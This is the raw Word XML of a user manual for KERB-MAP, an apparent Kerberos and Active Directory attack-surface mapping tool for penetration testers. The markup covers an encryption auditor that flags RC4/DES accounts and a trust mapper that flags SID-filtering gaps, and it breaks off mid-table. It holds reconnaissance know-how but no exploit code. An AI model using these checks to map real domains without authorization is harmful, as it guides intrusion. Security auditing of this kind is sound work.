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60B2C" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A278A4D" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F1745A" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F098C5E" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="96"/>
          <w:szCs w:val="96"/>
        </w:rPr>
        <w:t>KERB-MAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5ACCAA" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Kerberos Attack Surface Mapper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026A596C" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>User Manual &amp; Technical Reference</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F53889" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Version 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5D396CAE" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
              <w:bottom w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
              <w:right w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1A1A2E"/>
            <w:tcMar>
              <w:top w:w="300" w:type="dxa"/>
              <w:left w:w="400" w:type="dxa"/>
              <w:bottom w:w="300" w:type="dxa"/>
              <w:right w:w="400" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0E86B15F" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="80"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="A8D8EA"/>
              </w:rPr>
              <w:t>AD Enumeration  ·  Kerberoast Scoring  ·  Delegation Mapping</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="604F4C92" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="80"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="A8D8EA"/>
              </w:rPr>
              <w:t>CVE Detection  ·  Priority Ranking  ·  BloodHound Export  ·  Encryption Audit  ·  Trust Mapping</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7F0B41C6" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE73EB7" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5DE100" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8D93D8" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416D8CF3" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C52B0F" w14:textId="2C7A581B" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>For use in authorized penetration testing and red team engagements only.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10000001" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10000002" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="100" w:name="_Toc224561350"/>
      <w:r>
        <w:t>4.5  Encryption Auditor  (--encryption)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="100"/>
    </w:p>
    <w:p w14:paraId="10000003" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Audits Kerberos encryption type configuration across all domain accounts and Domain Controllers. Weak encryption (RC4/DES) enables faster offline cracking and downgrade attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10000004" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10000005" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>The module queries msDS-SupportedEncryptionTypes for all enabled user accounts and all DCs (userAccountControl bit 8192).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10000006"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c>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2C3E50"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="10000007" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Check</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2C3E50"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="20000001" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Condition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2C3E50"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="20000002" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="20000003" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>RC4-only accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="20000004" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>enc=0 or RC4 set without AES</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="20000005" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="20000006" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>DES accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="10000008" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>DES-CBC-CRC or DES-CBC-MD5 enabled</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="10000009" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1000000A" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Weak DCs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1000000B" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>DC supports RC4 or has no explicit AES</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1000000C" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1000000D" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1000000E" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>All findings feed into the priority scorer — weak DCs score 65 (HIGH), DES accounts score 60 (HIGH).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1000000F" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10000010" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="101" w:name="_Toc224561351"/>
      <w:r>
        <w:t>4.6  Trust Mapper  (--trusts)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="101"/>
    </w:p>
    <w:p w14:paraId="10000011" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Enumerates all domain trusts and assesses their risk based on direction, type, SID filtering status, and encryption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20000007" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20000008" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>LDAP filter: (objectClass=trustedDomain)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20000009" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Attributes: name, trustDirection, trustType, trustAttributes, securityIdentifier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2000000A" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2000000B" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Risk Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2000000C"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1560"/>
        <w:gridCol w:w="4680"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2C3E50"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="10000012" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2C3E50"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="10000013" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2C3E50"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="10000014" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Why</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="10000015" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Forest trust + SID filtering OFF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="10000016" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="10000017" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SID history injection across forest boundary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="10000018" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Bidirectional + no SID filtering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="10000019" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1000001A" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pivot path with SID history abuse</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1000001B" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Bidirectional trust</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2000000D" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2000000E" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pivot possible if partner domain compromised</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2000000F" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>RC4 encryption on trust</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="20000010" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>LOW</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
